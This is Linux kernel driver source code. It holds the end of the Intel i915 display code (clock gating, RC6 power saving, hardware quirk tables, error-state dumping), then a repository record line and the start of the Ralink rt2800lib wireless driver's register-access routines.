static void gen3_init_clock_gating(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
u32 dstate = I915_READ(D_STATE);
dstate |= DSTATE_PLL_D3_OFF | DSTATE_GFX_CLOCK_GATING |
DSTATE_DOT_CLOCK_GATING;
I915_WRITE(D_STATE, dstate);
}
static void i85x_init_clock_gating(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
I915_WRITE(RENCLK_GATE_D1, SV_CLOCK_GATE_DISABLE);
}
static void i830_init_clock_gating(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
I915_WRITE(DSPCLK_GATE_D, OVRUNIT_CLOCK_GATE_DISABLE);
}
static void ibx_init_clock_gating(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
/*
* On Ibex Peak and Cougar Point, we need to disable clock
* gating for the panel power sequencer or it will fail to
* start up when no ports are active.
*/
I915_WRITE(SOUTH_DSPCLK_GATE_D, PCH_DPLSUNIT_CLOCK_GATE_DISABLE);
}
static void cpt_init_clock_gating(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
int pipe;
/*
* On Ibex Peak and Cougar Point, we need to disable clock
* gating for the panel power sequencer or it will fail to
* start up when no ports are active.
*/
I915_WRITE(SOUTH_DSPCLK_GATE_D, PCH_DPLSUNIT_CLOCK_GATE_DISABLE);
I915_WRITE(SOUTH_CHICKEN2, I915_READ(SOUTH_CHICKEN2) |
DPLS_EDP_PPS_FIX_DIS);
/* Without this, mode sets may fail silently on FDI */
for_each_pipe(pipe)
I915_WRITE(TRANS_CHICKEN2(pipe), TRANS_AUTOTRAIN_GEN_STALL_DIS);
}
static void ironlake_teardown_rc6(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
if (dev_priv->renderctx) {
i915_gem_object_unpin(dev_priv->renderctx);
drm_gem_object_unreference(&dev_priv->renderctx->base);
dev_priv->renderctx = NULL;
}
if (dev_priv->pwrctx) {
i915_gem_object_unpin(dev_priv->pwrctx);
drm_gem_object_unreference(&dev_priv->pwrctx->base);
dev_priv->pwrctx = NULL;
}
}
static void ironlake_disable_rc6(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
if (I915_READ(PWRCTXA)) {
/* Wake the GPU, prevent RC6, then restore RSTDBYCTL */
I915_WRITE(RSTDBYCTL, I915_READ(RSTDBYCTL) | RCX_SW_EXIT);
wait_for(((I915_READ(RSTDBYCTL) & RSX_STATUS_MASK) == RSX_STATUS_ON),
50);
I915_WRITE(PWRCTXA, 0);
POSTING_READ(PWRCTXA);
I915_WRITE(RSTDBYCTL, I915_READ(RSTDBYCTL) & ~RCX_SW_EXIT);
POSTING_READ(RSTDBYCTL);
}
ironlake_teardown_rc6(dev);
}
static int ironlake_setup_rc6(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
if (dev_priv->renderctx == NULL)
dev_priv->renderctx = intel_alloc_context_page(dev);
if (!dev_priv->renderctx)
return -ENOMEM;
if (dev_priv->pwrctx == NULL)
dev_priv->pwrctx = intel_alloc_context_page(dev);
if (!dev_priv->pwrctx) {
ironlake_teardown_rc6(dev);
return -ENOMEM;
}
return 0;
}
void ironlake_enable_rc6(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
int ret;
/* rc6 disabled by default due to repeated reports of hanging during
* boot and resume.
*/
if (!i915_enable_rc6)
return;
mutex_lock(&dev->struct_mutex);
ret = ironlake_setup_rc6(dev);
if (ret) {
mutex_unlock(&dev->struct_mutex);
return;
}
/*
* GPU can automatically power down the render unit if given a page
* to save state.
*/
ret = BEGIN_LP_RING(6);
if (ret) {
ironlake_teardown_rc6(dev);
mutex_unlock(&dev->struct_mutex);
return;
}
OUT_RING(MI_SUSPEND_FLUSH | MI_SUSPEND_FLUSH_EN);
OUT_RING(MI_SET_CONTEXT);
OUT_RING(dev_priv->renderctx->gtt_offset |
MI_MM_SPACE_GTT |
MI_SAVE_EXT_STATE_EN |
MI_RESTORE_EXT_STATE_EN |
MI_RESTORE_INHIBIT);
OUT_RING(MI_SUSPEND_FLUSH);
OUT_RING(MI_NOOP);
OUT_RING(MI_FLUSH);
ADVANCE_LP_RING();
/*
* Wait for the command parser to advance past MI_SET_CONTEXT. The HW
* does an implicit flush, combined with MI_FLUSH above, it should be
* safe to assume that renderctx is valid
*/
ret = intel_wait_ring_idle(LP_RING(dev_priv));
if (ret) {
DRM_ERROR("failed to enable ironlake power power savings\n");
ironlake_teardown_rc6(dev);
mutex_unlock(&dev->struct_mutex);
return;
}
I915_WRITE(PWRCTXA, dev_priv->pwrctx->gtt_offset | PWRCTX_EN);
I915_WRITE(RSTDBYCTL, I915_READ(RSTDBYCTL) & ~RCX_SW_EXIT);
mutex_unlock(&dev->struct_mutex);
}
void intel_init_clock_gating(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
dev_priv->display.init_clock_gating(dev);
if (dev_priv->display.init_pch_clock_gating)
dev_priv->display.init_pch_clock_gating(dev);
}
/* Set up chip specific display functions */
static void intel_init_display(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
/* We always want a DPMS function */
if (HAS_PCH_SPLIT(dev)) {
dev_priv->display.dpms = ironlake_crtc_dpms;
dev_priv->display.crtc_mode_set = ironlake_crtc_mode_set;
dev_priv->display.update_plane = ironlake_update_plane;
} else {
dev_priv->display.dpms = i9xx_crtc_dpms;
dev_priv->display.crtc_mode_set = i9xx_crtc_mode_set;
dev_priv->display.update_plane = i9xx_update_plane;
}
if (I915_HAS_FBC(dev)) {
if (HAS_PCH_SPLIT(dev)) {
dev_priv->display.fbc_enabled = ironlake_fbc_enabled;
dev_priv->display.enable_fbc = ironlake_enable_fbc;
dev_priv->display.disable_fbc = ironlake_disable_fbc;
} else if (IS_GM45(dev)) {
dev_priv->display.fbc_enabled = g4x_fbc_enabled;
dev_priv->display.enable_fbc = g4x_enable_fbc;
dev_priv->display.disable_fbc = g4x_disable_fbc;
} else if (IS_CRESTLINE(dev)) {
dev_priv->display.fbc_enabled = i8xx_fbc_enabled;
dev_priv->display.enable_fbc = i8xx_enable_fbc;
dev_priv->display.disable_fbc = i8xx_disable_fbc;
}
/* 855GM needs testing */
}
/* Returns the core display clock speed */
if (IS_I945G(dev) || (IS_G33(dev) && ! IS_PINEVIEW_M(dev)))
dev_priv->display.get_display_clock_speed =
i945_get_display_clock_speed;
else if (IS_I915G(dev))
dev_priv->display.get_display_clock_speed =
i915_get_display_clock_speed;
else if (IS_I945GM(dev) || IS_845G(dev) || IS_PINEVIEW_M(dev))
dev_priv->display.get_display_clock_speed =
i9xx_misc_get_display_clock_speed;
else if (IS_I915GM(dev))
dev_priv->display.get_display_clock_speed =
i915gm_get_display_clock_speed;
else if (IS_I865G(dev))
dev_priv->display.get_display_clock_speed =
i865_get_display_clock_speed;
else if (IS_I85X(dev))
dev_priv->display.get_display_clock_speed =
i855_get_display_clock_speed;
else /* 852, 830 */
dev_priv->display.get_display_clock_speed =
i830_get_display_clock_speed;
/* For FIFO watermark updates */
if (HAS_PCH_SPLIT(dev)) {
if (HAS_PCH_IBX(dev))
dev_priv->display.init_pch_clock_gating = ibx_init_clock_gating;
else if (HAS_PCH_CPT(dev))
dev_priv->display.init_pch_clock_gating = cpt_init_clock_gating;
if (IS_GEN5(dev)) {
if (I915_READ(MLTR_ILK) & ILK_SRLT_MASK)
dev_priv->display.update_wm = ironlake_update_wm;
else {
DRM_DEBUG_KMS("Failed to get proper latency. "
"Disable CxSR\n");
dev_priv->display.update_wm = NULL;
}
dev_priv->display.fdi_link_train = ironlake_fdi_link_train;
dev_priv->display.init_clock_gating = ironlake_init_clock_gating;
} else if (IS_GEN6(dev)) {
if (SNB_READ_WM0_LATENCY()) {
dev_priv->display.update_wm = sandybridge_update_wm;
} else {
DRM_DEBUG_KMS("Failed to read display plane latency. "
"Disable CxSR\n");
dev_priv->display.update_wm = NULL;
}
dev_priv->display.fdi_link_train = gen6_fdi_link_train;
dev_priv->display.init_clock_gating = gen6_init_clock_gating;
} else if (IS_IVYBRIDGE(dev)) {
/* FIXME: detect B0+ stepping and use auto training */
dev_priv->display.fdi_link_train = ivb_manual_fdi_link_train;
if (SNB_READ_WM0_LATENCY()) {
dev_priv->display.update_wm = sandybridge_update_wm;
} else {
DRM_DEBUG_KMS("Failed to read display plane latency. "
"Disable CxSR\n");
dev_priv->display.update_wm = NULL;
}
dev_priv->display.init_clock_gating = ivybridge_init_clock_gating;
} else
dev_priv->display.update_wm = NULL;
} else if (IS_PINEVIEW(dev)) {
if (!intel_get_cxsr_latency(IS_PINEVIEW_G(dev),
dev_priv->is_ddr3,
dev_priv->fsb_freq,
dev_priv->mem_freq)) {
DRM_INFO("failed to find known CxSR latency "
"(found ddr%s fsb freq %d, mem freq %d), "
"disabling CxSR\n",
(dev_priv->is_ddr3 == 1) ? "3": "2",
dev_priv->fsb_freq, dev_priv->mem_freq);
/* Disable CxSR and never update its watermark again */
pineview_disable_cxsr(dev);
dev_priv->display.update_wm = NULL;
} else
dev_priv->display.update_wm = pineview_update_wm;
dev_priv->display.init_clock_gating = gen3_init_clock_gating;
} else if (IS_G4X(dev)) {
dev_priv->display.update_wm = g4x_update_wm;
dev_priv->display.init_clock_gating = g4x_init_clock_gating;
} else if (IS_GEN4(dev)) {
dev_priv->display.update_wm = i965_update_wm;
if (IS_CRESTLINE(dev))
dev_priv->display.init_clock_gating = crestline_init_clock_gating;
else if (IS_BROADWATER(dev))
dev_priv->display.init_clock_gating = broadwater_init_clock_gating;
} else if (IS_GEN3(dev)) {
dev_priv->display.update_wm = i9xx_update_wm;
dev_priv->display.get_fifo_size = i9xx_get_fifo_size;
dev_priv->display.init_clock_gating = gen3_init_clock_gating;
} else if (IS_I865G(dev)) {
dev_priv->display.update_wm = i830_update_wm;
dev_priv->display.init_clock_gating = i85x_init_clock_gating;
dev_priv->display.get_fifo_size = i830_get_fifo_size;
} else if (IS_I85X(dev)) {
dev_priv->display.update_wm = i9xx_update_wm;
dev_priv->display.get_fifo_size = i85x_get_fifo_size;
dev_priv->display.init_clock_gating = i85x_init_clock_gating;
} else {
dev_priv->display.update_wm = i830_update_wm;
dev_priv->display.init_clock_gating = i830_init_clock_gating;
if (IS_845G(dev))
dev_priv->display.get_fifo_size = i845_get_fifo_size;
else
dev_priv->display.get_fifo_size = i830_get_fifo_size;
}
/* Default just returns -ENODEV to indicate unsupported */
dev_priv->display.queue_flip = intel_default_queue_flip;
switch (INTEL_INFO(dev)->gen) {
case 2:
dev_priv->display.queue_flip = intel_gen2_queue_flip;
break;
case 3:
dev_priv->display.queue_flip = intel_gen3_queue_flip;
break;
case 4:
case 5:
dev_priv->display.queue_flip = intel_gen4_queue_flip;
break;
case 6:
dev_priv->display.queue_flip = intel_gen6_queue_flip;
break;
case 7:
dev_priv->display.queue_flip = intel_gen7_queue_flip;
break;
}
}
/*
* Some BIOSes insist on assuming the GPU's pipe A is enabled at suspend,
* resume, or other times. This quirk makes sure that's the case for
* affected systems.
*/
static void quirk_pipea_force (struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
dev_priv->quirks |= QUIRK_PIPEA_FORCE;
DRM_DEBUG_DRIVER("applying pipe a force quirk\n");
}
/*
* Some machines (Lenovo U160) do not work with SSC on LVDS for some reason
*/
static void quirk_ssc_force_disable(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
dev_priv->quirks |= QUIRK_LVDS_SSC_DISABLE;
}
struct intel_quirk {
int device;
int subsystem_vendor;
int subsystem_device;
void (*hook)(struct drm_device *dev);
};
struct intel_quirk intel_quirks[] = {
/* HP Compaq 2730p needs pipe A force quirk (LP: #291555) */
{ 0x2a42, 0x103c, 0x30eb, quirk_pipea_force },
/* HP Mini needs pipe A force quirk (LP: #322104) */
{ 0x27ae,0x103c, 0x361a, quirk_pipea_force },
/* Thinkpad R31 needs pipe A force quirk */
{ 0x3577, 0x1014, 0x0505, quirk_pipea_force },
/* Toshiba Protege R-205, S-209 needs pipe A force quirk */
{ 0x2592, 0x1179, 0x0001, quirk_pipea_force },
/* ThinkPad X30 needs pipe A force quirk (LP: #304614) */
{ 0x3577, 0x1014, 0x0513, quirk_pipea_force },
/* ThinkPad X40 needs pipe A force quirk */
/* ThinkPad T60 needs pipe A force quirk (bug #16494) */
{ 0x2782, 0x17aa, 0x201a, quirk_pipea_force },
/* 855 & before need to leave pipe A & dpll A up */
{ 0x3582, PCI_ANY_ID, PCI_ANY_ID, quirk_pipea_force },
{ 0x2562, PCI_ANY_ID, PCI_ANY_ID, quirk_pipea_force },
/* Lenovo U160 cannot use SSC on LVDS */
{ 0x0046, 0x17aa, 0x3920, quirk_ssc_force_disable },
/* Sony Vaio Y cannot use SSC on LVDS */
{ 0x0046, 0x104d, 0x9076, quirk_ssc_force_disable },
};
static void intel_init_quirks(struct drm_device *dev)
{
struct pci_dev *d = dev->pdev;
int i;
for (i = 0; i < ARRAY_SIZE(intel_quirks); i++) {
struct intel_quirk *q = &intel_quirks[i];
if (d->device == q->device &&
(d->subsystem_vendor == q->subsystem_vendor ||
q->subsystem_vendor == PCI_ANY_ID) &&
(d->subsystem_device == q->subsystem_device ||
q->subsystem_device == PCI_ANY_ID))
q->hook(dev);
}
}
/* Disable the VGA plane that we never use */
static void i915_disable_vga(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
u8 sr1;
u32 vga_reg;
if (HAS_PCH_SPLIT(dev))
vga_reg = CPU_VGACNTRL;
else
vga_reg = VGACNTRL;
vga_get_uninterruptible(dev->pdev, VGA_RSRC_LEGACY_IO);
outb(1, VGA_SR_INDEX);
sr1 = inb(VGA_SR_DATA);
outb(sr1 | 1<<5, VGA_SR_DATA);
vga_put(dev->pdev, VGA_RSRC_LEGACY_IO);
udelay(300);
I915_WRITE(vga_reg, VGA_DISP_DISABLE);
POSTING_READ(vga_reg);
}
void intel_modeset_init(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
int i;
drm_mode_config_init(dev);
dev->mode_config.min_width = 0;
dev->mode_config.min_height = 0;
dev->mode_config.funcs = (void *)&intel_mode_funcs;
intel_init_quirks(dev);
intel_init_display(dev);
if (IS_GEN2(dev)) {
dev->mode_config.max_width = 2048;
dev->mode_config.max_height = 2048;
} else if (IS_GEN3(dev)) {
dev->mode_config.max_width = 4096;
dev->mode_config.max_height = 4096;
} else {
dev->mode_config.max_width = 8192;
dev->mode_config.max_height = 8192;
}
dev->mode_config.fb_base = dev->agp->base;
DRM_DEBUG_KMS("%d display pipe%s available.\n",
dev_priv->num_pipe, dev_priv->num_pipe > 1 ? "s" : "");
for (i = 0; i < dev_priv->num_pipe; i++) {
intel_crtc_init(dev, i);
}
/* Just disable it once at startup */
i915_disable_vga(dev);
intel_setup_outputs(dev);
intel_init_clock_gating(dev);
if (IS_IRONLAKE_M(dev)) {
ironlake_enable_drps(dev);
intel_init_emon(dev);
}
if (IS_GEN6(dev) || IS_GEN7(dev)) {
gen6_enable_rps(dev_priv);
gen6_update_ring_freq(dev_priv);
}
INIT_WORK(&dev_priv->idle_work, intel_idle_update);
setup_timer(&dev_priv->idle_timer, intel_gpu_idle_timer,
(unsigned long)dev);
}
void intel_modeset_gem_init(struct drm_device *dev)
{
if (IS_IRONLAKE_M(dev))
ironlake_enable_rc6(dev);
intel_setup_overlay(dev);
}
void intel_modeset_cleanup(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
struct drm_crtc *crtc;
struct intel_crtc *intel_crtc;
drm_kms_helper_poll_fini(dev);
mutex_lock(&dev->struct_mutex);
intel_unregister_dsm_handler();
list_for_each_entry(crtc, &dev->mode_config.crtc_list, head) {
/* Skip inactive CRTCs */
if (!crtc->fb)
continue;
intel_crtc = to_intel_crtc(crtc);
intel_increase_pllclock(crtc);
}
intel_disable_fbc(dev);
if (IS_IRONLAKE_M(dev))
ironlake_disable_drps(dev);
if (IS_GEN6(dev) || IS_GEN7(dev))
gen6_disable_rps(dev);
if (IS_IRONLAKE_M(dev))
ironlake_disable_rc6(dev);
mutex_unlock(&dev->struct_mutex);
/* Disable the irq before mode object teardown, for the irq might
* enqueue unpin/hotplug work. */
drm_irq_uninstall(dev);
cancel_work_sync(&dev_priv->hotplug_work);
/* flush any delayed tasks or pending work */
flush_scheduled_work();
/* Shut off idle work before the crtcs get freed. */
list_for_each_entry(crtc, &dev->mode_config.crtc_list, head) {
intel_crtc = to_intel_crtc(crtc);
del_timer_sync(&intel_crtc->idle_timer);
}
del_timer_sync(&dev_priv->idle_timer);
cancel_work_sync(&dev_priv->idle_work);
drm_mode_config_cleanup(dev);
}
/*
* Return which encoder is currently attached for connector.
*/
struct drm_encoder *intel_best_encoder(struct drm_connector *connector)
{
return &intel_attached_encoder(connector)->base;
}
void intel_connector_attach_encoder(struct intel_connector *connector,
struct intel_encoder *encoder)
{
connector->encoder = encoder;
drm_mode_connector_attach_encoder(&connector->base,
&encoder->base);
}
/*
* set vga decode state - true == enable VGA decode
*/
int intel_modeset_vga_set_state(struct drm_device *dev, bool state)
{
struct drm_i915_private *dev_priv = dev->dev_private;
u16 gmch_ctrl;
pci_read_config_word(dev_priv->bridge_dev, INTEL_GMCH_CTRL, &gmch_ctrl);
if (state)
gmch_ctrl &= ~INTEL_GMCH_VGA_DISABLE;
else
gmch_ctrl |= INTEL_GMCH_VGA_DISABLE;
pci_write_config_word(dev_priv->bridge_dev, INTEL_GMCH_CTRL, gmch_ctrl);
return 0;
}
#ifdef CONFIG_DEBUG_FS
#include <linux/seq_file.h>
struct intel_display_error_state {
struct intel_cursor_error_state {
u32 control;
u32 position;
u32 base;
u32 size;
} cursor[2];
struct intel_pipe_error_state {
u32 conf;
u32 source;
u32 htotal;
u32 hblank;
u32 hsync;
u32 vtotal;
u32 vblank;
u32 vsync;
} pipe[2];
struct intel_plane_error_state {
u32 control;
u32 stride;
u32 size;
u32 pos;
u32 addr;
u32 surface;
u32 tile_offset;
} plane[2];
};
struct intel_display_error_state *
intel_display_capture_error_state(struct drm_device *dev)
{
drm_i915_private_t *dev_priv = dev->dev_private;
struct intel_display_error_state *error;
int i;
error = kmalloc(sizeof(*error), GFP_ATOMIC);
if (error == NULL)
return NULL;
for (i = 0; i < 2; i++) {
error->cursor[i].control = I915_READ(CURCNTR(i));
error->cursor[i].position = I915_READ(CURPOS(i));
error->cursor[i].base = I915_READ(CURBASE(i));
error->plane[i].control = I915_READ(DSPCNTR(i));
error->plane[i].stride = I915_READ(DSPSTRIDE(i));
error->plane[i].size = I915_READ(DSPSIZE(i));
error->plane[i].pos= I915_READ(DSPPOS(i));
error->plane[i].addr = I915_READ(DSPADDR(i));
if (INTEL_INFO(dev)->gen >= 4) {
error->plane[i].surface = I915_READ(DSPSURF(i));
error->plane[i].tile_offset = I915_READ(DSPTILEOFF(i));
}
error->pipe[i].conf = I915_READ(PIPECONF(i));
error->pipe[i].source = I915_READ(PIPESRC(i));
error->pipe[i].htotal = I915_READ(HTOTAL(i));
error->pipe[i].hblank = I915_READ(HBLANK(i));
error->pipe[i].hsync = I915_READ(HSYNC(i));
error->pipe[i].vtotal = I915_READ(VTOTAL(i));
error->pipe[i].vblank = I915_READ(VBLANK(i));
error->pipe[i].vsync = I915_READ(VSYNC(i));
}
return error;
}
void
intel_display_print_error_state(struct seq_file *m,
struct drm_device *dev,
struct intel_display_error_state *error)
{
int i;
for (i = 0; i < 2; i++) {
seq_printf(m, "Pipe [%d]:\n", i);
seq_printf(m, " CONF: %08x\n", error->pipe[i].conf);
seq_printf(m, " SRC: %08x\n", error->pipe[i].source);
seq_printf(m, " HTOTAL: %08x\n", error->pipe[i].htotal);
seq_printf(m, " HBLANK: %08x\n", error->pipe[i].hblank);
seq_printf(m, " HSYNC: %08x\n", error->pipe[i].hsync);
seq_printf(m, " VTOTAL: %08x\n", error->pipe[i].vtotal);
seq_printf(m, " VBLANK: %08x\n", error->pipe[i].vblank);
seq_printf(m, " VSYNC: %08x\n", error->pipe[i].vsync);
seq_printf(m, "Plane [%d]:\n", i);
seq_printf(m, " CNTR: %08x\n", error->plane[i].control);
seq_printf(m, " STRIDE: %08x\n", error->plane[i].stride);
seq_printf(m, " SIZE: %08x\n", error->plane[i].size);
seq_printf(m, " POS: %08x\n", error->plane[i].pos);
seq_printf(m, " ADDR: %08x\n", error->plane[i].addr);
if (INTEL_INFO(dev)->gen >= 4) {
seq_printf(m, " SURF: %08x\n", error->plane[i].surface);
seq_printf(m, " TILEOFF: %08x\n", error->plane[i].tile_offset);
}
seq_printf(m, "Cursor [%d]:\n", i);
seq_printf(m, " CNTR: %08x\n", error->cursor[i].control);
seq_printf(m, " POS: %08x\n", error->cursor[i].position);
seq_printf(m, " BASE: %08x\n", error->cursor[i].base);
}
}
#endif
| gpl-2.0 |
spl0i7/linux-backports | drivers/net/wireless/rt2x00/rt2800lib.c | 3 | 251448 | /*
Copyright (C) 2010 Willow Garage <http://www.willowgarage.com>
Copyright (C) 2010 Ivo van Doorn <IvDoorn@gmail.com>
Copyright (C) 2009 Bartlomiej Zolnierkiewicz <bzolnier@gmail.com>
Copyright (C) 2009 Gertjan van Wingerde <gwingerde@gmail.com>
Based on the original rt2800pci.c and rt2800usb.c.
Copyright (C) 2009 Alban Browaeys <prahal@yahoo.com>
Copyright (C) 2009 Felix Fietkau <nbd@openwrt.org>
Copyright (C) 2009 Luis Correia <luis.f.correia@gmail.com>
Copyright (C) 2009 Mattias Nissler <mattias.nissler@gmx.de>
Copyright (C) 2009 Mark Asselstine <asselsm@gmail.com>
Copyright (C) 2009 Xose Vazquez Perez <xose.vazquez@gmail.com>
<http://rt2x00.serialmonkey.com>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
*/
/*
Module: rt2800lib
Abstract: rt2800 generic device routines.
*/
#include <linux/crc-ccitt.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/slab.h>
#include "rt2x00.h"
#include "rt2800lib.h"
#include "rt2800.h"
/*
* Register access.
* All access to the CSR registers will go through the methods
* rt2800_register_read and rt2800_register_write.
* BBP and RF register require indirect register access,
* and use the CSR registers BBPCSR and RFCSR to achieve this.
* These indirect registers work with busy bits,
* and we will try maximal REGISTER_BUSY_COUNT times to access
* the register while taking a REGISTER_BUSY_DELAY us delay
* between each attampt. When the busy bit is still set at that time,
* the access attempt is considered to have failed,
* and we will print an error.
* The _lock versions must be used if you already hold the csr_mutex
*/
#define WAIT_FOR_BBP(__dev, __reg) \
rt2800_regbusy_read((__dev), BBP_CSR_CFG, BBP_CSR_CFG_BUSY, (__reg))
#define WAIT_FOR_RFCSR(__dev, __reg) \
rt2800_regbusy_read((__dev), RF_CSR_CFG, RF_CSR_CFG_BUSY, (__reg))
#define WAIT_FOR_RF(__dev, __reg) \
rt2800_regbusy_read((__dev), RF_CSR_CFG0, RF_CSR_CFG0_BUSY, (__reg))
#define WAIT_FOR_MCU(__dev, __reg) \
rt2800_regbusy_read((__dev), H2M_MAILBOX_CSR, \
H2M_MAILBOX_CSR_OWNER, (__reg))
static inline bool rt2800_is_305x_soc(struct rt2x00_dev *rt2x00dev)
{
/* check for rt2872 on SoC */
if (!rt2x00_is_soc(rt2x00dev) ||
!rt2x00_rt(rt2x00dev, RT2872))
return false;
/* we know for sure that these rf chipsets are used on rt305x boards */
if (rt2x00_rf(rt2x00dev, RF3020) ||
rt2x00_rf(rt2x00dev, RF3021) ||
rt2x00_rf(rt2x00dev, RF3022))
return true;
rt2x00_warn(rt2x00dev, "Unknown RF chipset on rt305x\n");
return false;
}
static void rt2800_bbp_write(struct rt2x00_dev *rt2x00dev,
const unsigned int word, const u8 value)
{
u32 reg;
mutex_lock(&rt2x00dev->csr_mutex);
/*
* Wait until the BBP becomes available, afterwards we
* can safely write the new data into the register.
*/
if (WAIT_FOR_BBP(rt2x00dev, ®)) {
reg = 0;
rt2x00_set_field32(®, BBP_CSR_CFG_VALUE, value);
rt2x00_set_field32(®, BBP_CSR_CFG_REGNUM, word);
rt2x00_set_field32(®, BBP_CSR_CFG_BUSY, 1);
rt2x00_set_field32(®, BBP_CSR_CFG_READ_CONTROL, 0);
rt2x00_set_field32(®, BBP_CSR_CFG_BBP_RW_MODE, 1);
rt2800_register_write_lock(rt2x00dev, BBP_CSR_CFG, reg);
}
mutex_unlock(&rt2x00dev->csr_mutex);
}
static void rt2800_bbp_read(struct rt2x00_dev *rt2x00dev,
const unsigned int word, u8 *value)
{
u32 reg;
mutex_lock(&rt2x00dev->csr_mutex);
/*
* Wait until the BBP becomes available, afterwards we
* can safely write the read request into the register.
* After the data has been written, we wait until hardware
* returns the correct value, if at any time the register
* doesn't become available in time, reg will be 0xffffffff
* which means we return 0xff to the caller.
*/
if (WAIT_FOR_BBP(rt2x00dev, ®)) {
reg = 0;
rt2x00_set_field32(®, BBP_CSR_CFG_REGNUM, word);
rt2x00_set_field32(®, BBP_CSR_CFG_BUSY, 1);
rt2x00_set_field32(®, BBP_CSR_CFG_READ_CONTROL, 1);
rt2x00_set_field32(®, BBP_CSR_CFG_BBP_RW_MODE, 1);
rt2800_register_write_lock(rt2x00dev, BBP_CSR_CFG, reg);
WAIT_FOR_BBP(rt2x00dev, ®);
}
*value = rt2x00_get_field32(reg, BBP_CSR_CFG_VALUE);
mutex_unlock(&rt2x00dev->csr_mutex);
}
static void rt2800_rfcsr_write(struct rt2x00_dev *rt2x00dev,
const unsigned int word, const u8 value)
{
u32 reg;
mutex_lock(&rt2x00dev->csr_mutex);
/*
* Wait until the RFCSR becomes available, afterwards we
* can safely write the new data into the register.
*/
if (WAIT_FOR_RFCSR(rt2x00dev, ®)) {
reg = 0;
rt2x00_set_field32(®, RF_CSR_CFG_DATA, value);
rt2x00_set_field32(®, RF_CSR_CFG_REGNUM, word);
rt2x00_set_field32(®, RF_CSR_CFG_WRITE, 1);
rt2x00_set_field32(®, RF_CSR_CFG_BUSY, 1);
rt2800_register_write_lock(rt2x00dev, RF_CSR_CFG, reg);
}
mutex_unlock(&rt2x00dev->csr_mutex);
}
static void rt2800_rfcsr_read(struct rt2x00_dev *rt2x00dev,
const unsigned int word, u8 *value)
{
u32 reg;
mutex_lock(&rt2x00dev->csr_mutex);
/*
* Wait until the RFCSR becomes available, afterwards we
* can safely write the read request into the register.
* After the data has been written, we wait until hardware
* returns the correct value, if at any time the register
* doesn't become available in time, reg will be 0xffffffff
* which means we return 0xff to the caller.
*/
if (WAIT_FOR_RFCSR(rt2x00dev, ®)) {
reg = 0;
rt2x00_set_field32(®, RF_CSR_CFG_REGNUM, word);
rt2x00_set_field32(®, RF_CSR_CFG_WRITE, 0);
rt2x00_set_field32(®, RF_CSR_CFG_BUSY, 1);
rt2800_register_write_lock(rt2x00dev, RF_CSR_CFG, reg);
WAIT_FOR_RFCSR(rt2x00dev, ®);
}
*value = rt2x00_get_field32(reg, RF_CSR_CFG_DATA);
mutex_unlock(&rt2x00dev->csr_mutex);
}
static void rt2800_rf_write(struct rt2x00_dev *rt2x00dev,
const unsigned int word, const u32 value)
{
u32 reg;
mutex_lock(&rt2x00dev->csr_mutex);
/*
* Wait until the RF becomes available, afterwards we
* can safely write the new data into the register.
*/
if (WAIT_FOR_RF(rt2x00dev, ®)) {
reg = 0;
rt2x00_set_field32(®, RF_CSR_CFG0_REG_VALUE_BW, value);
rt2x00_set_field32(®, RF_CSR_CFG0_STANDBYMODE, 0);
rt2x00_set_field32(®, RF_CSR_CFG0_SEL, 0);
rt2x00_set_field32(®, RF_CSR_CFG0_BUSY, 1);
rt2800_register_write_lock(rt2x00dev, RF_CSR_CFG0, reg);
rt2x00_rf_write(rt2x00dev, word, value);
}
mutex_unlock(&rt2x00dev->csr_mutex);
}
static const unsigned int rt2800_eeprom_map[EEPROM_WORD_COUNT] = {
[EEPROM_CHIP_ID] = 0x0000,
[EEPROM_VERSION] = 0x0001,
[EEPROM_MAC_ADDR_0] = 0x0002,
[EEPROM_MAC_ADDR_1] = 0x0003,
[EEPROM_MAC_ADDR_2] = 0x0004,
[EEPROM_NIC_CONF0] = 0x001a,
[EEPROM_NIC_CONF1] = 0x001b,
[EEPROM_FREQ] = 0x001d,
[EEPROM_LED_AG_CONF] = 0x001e,
[EEPROM_LED_ACT_CONF] = 0x001f,
[EEPROM_LED_POLARITY] = 0x0020,
[EEPROM_NIC_CONF2] = 0x0021,
[EEPROM_LNA] = 0x0022,
[EEPROM_RSSI_BG] = 0x0023,
[EEPROM_RSSI_BG2] = 0x0024,
[EEPROM_TXMIXER_GAIN_BG] = 0x0024, /* overlaps with RSSI_BG2 */
[EEPROM_RSSI_A] = 0x0025,
[EEPROM_RSSI_A2] = 0x0026,
[EEPROM_TXMIXER_GAIN_A] = 0x0026, /* overlaps with RSSI_A2 */
[EEPROM_EIRP_MAX_TX_POWER] = 0x0027,
[EEPROM_TXPOWER_DELTA] = 0x0028,
[EEPROM_TXPOWER_BG1] = 0x0029,
[EEPROM_TXPOWER_BG2] = 0x0030,
[EEPROM_TSSI_BOUND_BG1] = 0x0037,
[EEPROM_TSSI_BOUND_BG2] = 0x0038,
[EEPROM_TSSI_BOUND_BG3] = 0x0039,
[EEPROM_TSSI_BOUND_BG4] = 0x003a,
[EEPROM_TSSI_BOUND_BG5] = 0x003b,
